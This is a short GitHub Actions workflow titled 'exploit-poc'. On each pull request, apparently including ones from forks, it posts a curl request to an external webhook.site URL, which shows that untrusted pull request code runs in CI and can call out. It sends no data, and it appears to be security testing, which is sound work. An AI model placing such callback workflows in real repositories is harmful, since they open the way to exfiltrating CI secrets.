name: exploit-poc

on: [pull_request]

jobs:
  send_request:
    runs-on: ubuntu-latest
    steps:
      - name: Check runner context
        run: |
          echo "GITHUB_ACTION run in context of PR from fork"
      - name: Trigger webhook
        run: |
          curl -X POST https://webhook.site/8c9bd330-225d-4fb0-ab16-4f996d68b9c1
